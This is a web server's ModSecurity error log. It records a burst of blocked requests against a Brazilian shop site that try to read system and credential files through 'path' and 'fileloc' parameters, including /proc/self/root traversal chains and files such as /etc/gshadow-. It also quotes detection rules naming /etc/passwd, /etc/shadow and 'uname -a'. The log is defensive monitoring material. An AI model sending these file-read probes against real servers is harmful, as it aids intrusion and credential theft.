[Thu Mar 19 11:46:10.855468 2026] [:error] [pid 14269:tid 140411666392832] [client 57.141.18.10:37590] [client 57.141.18.10] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMMgbLMZ6AikZjR9Vj4AAAAAk"]
[Thu Mar 19 11:46:11.195501 2026] [:error] [pid 26799:tid 140411548894976] [client 57.141.18.69:37604] [client 57.141.18.69] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMM9a6ubjKNq_cu4Zb2gAAA1c"]
[Thu Mar 19 11:46:11.565844 2026] [:error] [pid 17653:tid 140411540502272] [client 57.141.18.75:37576] [client 57.141.18.75] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/csh.login"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMM8df6f5d65gmYZR-agAAAtg"]
[Thu Mar 19 11:46:12.560598 2026] [:error] [pid 15826:tid 140411683178240] [client 57.141.18.33:37638] [client 57.141.18.33] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/hosts.deny"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMNOoXxyEfFpUF8f8UWAAAAUc"]
[Thu Mar 19 11:46:12.924657 2026] [:error] [pid 17653:tid 140411733534464] [client 57.141.18.34:37646] [client 57.141.18.34] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMNMdf6f5d65gmYZR-awAAAsE"]
[Thu Mar 19 11:46:13.126544 2026] [:error] [pid 14269:tid 140411599251200] [client 57.141.18.41:37662] [client 57.141.18.41] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/rc.local"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMNQbLMZ6AikZjR9Vj4gAAABE"]
[Thu Mar 19 11:46:13.690797 2026] [:error] [pid 27293:tid 140411557287680] [client 57.141.18.41:37676] [client 57.141.18.41] ModSecurity: Access denied with code 403 (phase 1). Pattern match "(?:/etc/passwd|/etc/shadow|/proc/self/environ|uname -a|uname -r)" at REQUEST_LINE. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_12_KnowAttacks.conf"] [line "5"] [id "99000"] [msg "Locaweb Custom Rules - Command execution attack"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMNf-YZRR_7pZ7nDKSNwAAA9Y"]
[Thu Mar 19 11:46:14.027051 2026] [:error] [pid 19093:tid 140411641214720] [client 74.7.243.128:55956] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwMNl_V7PWP6ixUYl7DWwAAAow"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 11:46:14.073107 2026] [:error] [pid 19093:tid 140411607643904] [client 57.141.18.69:37688] [client 57.141.18.69] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/ethertypes"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMNl_V7PWP6ixUYl7DXAAAApA"]
[Thu Mar 19 11:46:14.423946 2026] [:error] [pid 15826:tid 140411624429312] [client 57.141.18.80:37690] [client 57.141.18.80] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/resolv.conf.save"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMNuoXxyEfFpUF8f8UWwAAAU4"]
[Thu Mar 19 11:46:14.565481 2026] [:error] [pid 31803:tid 140411649607424] [client 74.7.241.31:39050] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwMNuyqAr6etmhZHNpm3wAAAEs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 11:46:14.983129 2026] [:error] [pid 31803:tid 140411699963648] [client 57.141.18.41:37704] [client 57.141.18.41] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/hosts.allow"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMNuyqAr6etmhZHNpm4AAAAEU"]
[Thu Mar 19 11:46:15.195730 2026] [:error] [pid 15826:tid 140411590858496] [client 57.141.18.81:37712] [client 57.141.18.81] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMN-oXxyEfFpUF8f8UXAAAAVI"]
[Thu Mar 19 11:46:15.351875 2026] [:error] [pid 27403:tid 140411699963648] [client 57.141.18.44:37716] [client 57.141.18.44] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/sestatus.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMNxkFeYa1D6dYQnD3RQAAAcU"]
[Thu Mar 19 11:46:16.073583 2026] [:error] [pid 27293:tid 140411683178240] [client 57.141.18.92:37726] [client 57.141.18.92] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMOP-YZRR_7pZ7nDKSOAAAA8c"]
[Thu Mar 19 11:46:16.260678 2026] [:error] [pid 17887:tid 140411649607424] [client 74.7.241.31:39054] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwMOAkwaGbbGflqUZDKEQAAAMs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 11:46:16.638733 2026] [:error] [pid 19093:tid 140411565680384] [client 57.141.18.111:37736] [client 57.141.18.111] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMOF_V7PWP6ixUYl7DYAAAApU"]
[Thu Mar 19 11:46:16.888840 2026] [:error] [pid 31803:tid 140411683178240] [client 57.141.18.53:37742] [client 57.141.18.53] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMOOyqAr6etmhZHNpm4QAAAEc"]
[Thu Mar 19 11:46:17.139431 2026] [:error] [pid 27293:tid 140411649607424] [client 57.141.18.85:37746] [client 57.141.18.85] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/gshadow-"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMOf-YZRR_7pZ7nDKSOQAAA8s"]
[Thu Mar 19 11:46:17.606443 2026] [:error] [pid 15826:tid 140411632822016] [client 57.141.18.68:37756] [client 57.141.18.68] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMOeoXxyEfFpUF8f8UXgAAAU0"]
[Thu Mar 19 11:46:17.807375 2026] [:error] [pid 14269:tid 140411725141760] [client 74.7.241.31:47070] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwMOQbLMZ6AikZjR9Vj4wAAAAI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 11:46:17.815889 2026] [:error] [pid 27403:tid 140411557287680] [client 57.141.18.39:37760] [client 57.141.18.39] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMORkFeYa1D6dYQnD3RgAAAdY"]
[Thu Mar 19 11:46:18.299819 2026] [:error] [pid 31803:tid 140411590858496] [client 57.141.18.65:37770] [client 57.141.18.65] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/fail2ban"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMOuyqAr6etmhZHNpm4gAAAFI"]
[Thu Mar 19 11:46:18.643156 2026] [:error] [pid 15826:tid 140411565680384] [client 57.141.18.74:37774] [client 57.141.18.74] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/chrony.keys"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMOuoXxyEfFpUF8f8UXwAAAVU"]
[Thu Mar 19 11:46:18.830764 2026] [:error] [pid 30077:tid 140411565680384] [client 57.141.18.75:37778] [client 57.141.18.75] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMOvu8EFLIOrSqIpuuAwAAAlU"]
[Thu Mar 19 11:46:19.327484 2026] [:error] [pid 15826:tid 140411582465792] [client 57.141.18.93:37790] [client 57.141.18.93] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMO-oXxyEfFpUF8f8UYAAAAVM"]
[Thu Mar 19 11:46:19.887617 2026] [:error] [pid 26799:tid 140411658000128] [client 57.141.18.41:37802] [client 57.141.18.41] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMO9a6ubjKNq_cu4Zb3QAAA0o"]
[Thu Mar 19 11:46:20.223620 2026] [:error] [pid 30077:tid 140411641214720] [client 57.141.18.53:37808] [client 57.141.18.53] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/netconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMPPu8EFLIOrSqIpuuBAAAAkw"]
